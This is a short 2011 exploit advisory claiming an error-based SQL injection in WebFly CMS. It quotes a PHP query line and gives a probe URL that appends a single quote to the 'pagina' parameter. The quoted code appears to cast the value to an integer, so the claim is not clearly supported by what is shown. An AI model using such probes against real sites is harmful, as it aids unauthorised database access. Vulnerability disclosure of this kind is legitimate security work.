[$] Exploit Title     : WebFly CMS Error Based SQL Injection Vulnerability
[$] Versions Affected : ALL
[$] Date              : 21-03-2011           
[$] Author            : MasterGipy
[$] Email             : mastergipy [at] gmail.com
[$] Bug               : Error Based SQL Injection Vulnerability
[$] Google Dork       : [None]
 
[$] Vulnerable code in /web/inc/paginas/inc.paginas.top.php
 
$query_DetalhesPagina = sprintf("SELECT * FROM paginas WHERE ID = %s and Activo = 'Y'", GetSQLValueString($colname_DetalhesPagina, "int")); 


[$] Exploit
 
[+] http://[site]/index.php?pagina=1  <- [ERROR BASED SQL INJECTION]


[+] e.g. 
    http://example.pt/index.php?pagina=2'
 
 
 
[$] Greetings from PORTUGAL ^^